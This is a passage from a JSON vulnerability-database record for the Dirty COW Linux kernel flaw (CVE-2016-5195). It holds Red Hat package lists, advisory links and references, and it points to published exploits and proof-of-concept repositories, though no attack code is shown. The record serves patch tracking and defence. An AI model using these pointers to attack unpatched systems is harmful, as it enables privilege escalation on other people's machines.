6):\n\nSource:\nkernel-2.6.32-642.6.2.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-642.6.2.el6.noarch.rpm\nkernel-doc-2.6.32-642.6.2.el6.noarch.rpm\nkernel-firmware-2.6.32-642.6.2.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debug-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-devel-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-headers-2.6.32-642.6.2.el6.x86_64.rpm\nperf-2.6.32-642.6.2.el6.x86_64.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-642.6.2.el6.x86_64.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\npython-perf-2.6.32-642.6.2.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nkernel-2.6.32-642.6.2.el6.src.rpm\n\ni386:\nkernel-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm\nkernel-devel-2.6.32-642.6.2.el6.i686.rpm\nkernel-headers-2.6.32-642.6.2.el6.i686.rpm\nperf-2.6.32-642.6.2.el6.i686.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-642.6.2.el6.noarch.rpm\nkernel-doc-2.6.32-642.6.2.el6.noarch.rpm\nkernel-firmware-2.6.32-642.6.2.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-642.6.2.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-642.6.2.el6.ppc64.rpm\nkernel-debug-2.6.32-642.6.2.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-642.6.2.el6.ppc64.rpm\nkernel-devel-2.6.32-642.6.2.el6.ppc64.rpm\nkernel-headers-2.6.32-642.6.2.el6.ppc64.rpm\nperf-2.6.32-642.6.2.el6.ppc64.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-642.6.2.el6.s390x.rpm\nkernel-debug-2.6.32-642.6.2.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.s390x.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.s390x.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-642.6.2.el6.s390x.rpm\nkernel-devel-2.6.32-642.6.2.el6.s390x.rpm\nkernel-headers-2.6.32-642.6.2.el6.s390x.rpm\nkernel-kdump-2.6.32-642.6.2.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-642.6.2.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-642.6.2.el6.s390x.rpm\nperf-2.6.32-642.6.2.el6.s390x.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debug-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-devel-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-headers-2.6.32-642.6.2.el6.x86_64.rpm\nperf-2.6.32-642.6.2.el6.x86_64.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\npython-perf-2.6.32-642.6.2.el6.i686.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-642.6.2.el6.ppc64.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm\npython-perf-2.6.32-642.6.2.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.s390x.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-642.6.2.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-642.6.2.el6.s390x.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.s390x.rpm\npython-perf-2.6.32-642.6.2.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-642.6.2.el6.x86_64.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\npython-perf-2.6.32-642.6.2.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nkernel-2.6.32-642.6.2.el6.src.rpm\n\ni386:\nkernel-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm\nkernel-devel-2.6.32-642.6.2.el6.i686.rpm\nkernel-headers-2.6.32-642.6.2.el6.i686.rpm\nperf-2.6.32-642.6.2.el6.i686.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-642.6.2.el6.noarch.rpm\nkernel-doc-2.6.32-642.6.2.el6.noarch.rpm\nkernel-firmware-2.6.32-642.6.2.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debug-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.i686.rpm\nkernel-debug-devel-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-devel-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-headers-2.6.32-642.6.2.el6.x86_64.rpm\nperf-2.6.32-642.6.2.el6.x86_64.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-642.6.2.el6.i686.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\npython-perf-2.6.32-642.6.2.el6.i686.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-642.6.2.el6.x86_64.rpm\nperf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\npython-perf-2.6.32-642.6.2.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-642.6.2.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-5195\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/2706661\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD4DBQFYEJcBXlSAg2UNWIIRAiWLAKCCzQq/hlgGpFbZwm1VmGEtsf8qbwCYhOVp\ncoEi7YBOAF6JIj/7g1jNNg==\n=enSu\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      },
      {
        "db": "BID",
        "id": "93793"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-5195"
      },
      {
        "db": "PACKETSTORM",
        "id": "139316"
      },
      {
        "db": "PACKETSTORM",
        "id": "139244"
      },
      {
        "db": "PACKETSTORM",
        "id": "139277"
      },
      {
        "db": "PACKETSTORM",
        "id": "139448"
      },
      {
        "db": "PACKETSTORM",
        "id": "139334"
      }
    ],
    "trust": 1.71
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=40611",
        "trust": 0.5,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-5195",
        "trust": 1.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#243144",
        "trust": 1.3
      },
      {
        "db": "JUNIPER",
        "id": "JSA10770",
        "trust": 1.3
      },
      {
        "db": "BID",
        "id": "93793",
        "trust": 1.3
      },
      {
        "db": "PACKETSTORM",
        "id": "139277",
        "trust": 1.1
      },
      {
        "db": "JUNIPER",
        "id": "JSA10807",
        "trust": 1.0
      },
      {
        "db": "JUNIPER",
        "id": "JSA10774",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2016/11/03/7",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2016/10/30/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/08/15/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2016/10/21/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2016/10/27/13",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/08/08/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/03/07/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2016/10/26/7",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/08/08/7",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/08/08/2",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/08/08/8",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/08/09/4",
        "trust": 1.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "40611",
        "trust": 1.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "40839",
        "trust": 1.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "40616",
        "trust": 1.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "40847",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "142151",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "139923",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "139287",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "139922",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "139286",
        "trust": 1.0
      },
      {
        "db": "MCAFEE",
        "id": "SB10177",
        "trust": 1.0
      },
      {
        "db": "MCAFEE",
        "id": "SB10222",
        "trust": 1.0
      },
      {
        "db": "MCAFEE",
        "id": "SB10176",
        "trust": 1.0
      },
      {
        "db": "SECTRACK",
        "id": "1037078",
        "trust": 1.0
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-5195",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139316",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139244",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139448",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139334",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5195"
      },
      {
        "db": "BID",
        "id": "93793"
      },
      {
        "db": "PACKETSTORM",
        "id": "139316"
      },
      {
        "db": "PACKETSTORM",
        "id": "139244"
      },
      {
        "db": "PACKETSTORM",
        "id": "139277"
      },
      {
        "db": "PACKETSTORM",
        "id": "139448"
      },
      {
        "db": "PACKETSTORM",
        "id": "139334"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "id": "VAR-201611-0386",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.7828162515384616
  },
  "last_update_date": "2025-12-22T23:04:53.271000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Red Hat: Important: kernel-rt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162110 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162124 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162128 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162126 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162106 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162127 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162120 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162132 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162118 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162098 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162105 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162133 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162107 - Security Advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux-snapdragon vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3106-4"
      },
      {
        "title": "Ubuntu Security Notice: linux-raspi2 vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3107-2"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3107-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3104-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-raspi2 vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3106-3"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3105-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-trusty vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3105-2"
      },
      {
        "title": "Ubuntu Security Notice: linux-ti-omap4 vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3104-2"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3106-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-xenial vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3106-2"
      },
      {
        "title": "Cisco: Cisco TelePresence Video Communication Server Test Validation Script Issue",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20181107-vcsd"
      },
      {
        "title": "dirty-cow-toolkit",
        "trust": 0.1,
        "url": "https://github.com/roliboy/rootcow "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/yatt-ze/DirtyCowAndroid "
      },
      {
        "title": "polaris-dict-a63-arch",
        "trust": 0.1,
        "url": "https://github.com/zaoqi/polaris-dict-a63-arch "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-362",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.3,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619"
      },
      {
        "trust": 1.3,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1384344"
      },
      {
        "trust": 1.3,
        "url": "https://source.android.com/security/bulletin/2016-12-01.html"
      },
      {
        "trust": 1.3,
        "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161207-01-dirtycow-en"
      },
      {
        "trust": 1.3,
        "url": "https://github.com/dirtycow/dirtycow.github.io/wiki/pocs"
      },
      {
        "trust": 1.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2118.html"
      },
      {
        "trust": 1.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2120.html"
      },
      {
        "trust": 1.3,
        "url": "https://www.kb.cert.org/vuls/id/243144"
      },
      {
        "trust": 1.3,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20161026-linux"
      },
      {
        "trust": 1.3,
        "url": "https://github.com/dirtycow/dirtycow.github.io/wiki/vulnerabilitydetails"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-5195"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-3107-1"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-3107-2"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-3106-1"
      },
      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2133.html"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/security/vulnerabilities/2706661"
      },
      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2105.html"
      },
      {
        "trust": 1.0,
        "url": "https://people.canonical.com/~ubuntu-security/cve/2016/cve-2016-5195.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3106-3"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/e7m62srp6czlj4zxcrzkv4wplqbsr7dt/"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00067.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00100.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00057.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00064.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00053.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00036.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/139922/linux-kernel-dirty-cow-ptrace_pokedata-privilege-escalation.html"
      },
      {
        "trust": 1.0,
        "url": "http://seclists.org/fulldisclosure/2024/aug/35"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05341463"
      },
      {
        "trust": 1.0,
        "url": "https://dirtycow.ninja"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03722en_us"
      },
      {
        "trust": 1.0,
        "url": "https://security-tracker.debian.org/tracker/cve-2016-5195"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/archive/1/539611/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/539611/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/08/08/1"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-c05352241"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00035.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00063.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2106.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/archive/1/540252/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00054.html"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03742en_us"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00066.html"
      },
      {
        "trust": 1.0,
        "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2016-5195"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00072.html"
      },
      {
        "trust": 1.0,
        "url": "https://github.com/torvalds/linux/commit/19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00065.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00041.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/540344/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://fortiguard.com/advisory/fg-ir-16-063"
      },
      {
        "trust": 1.0,
        "url": "https://www.exploit-db.com/exploits/40611/"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00040.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00045.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00048.html"
      },
      {
        "trust": 1.0,
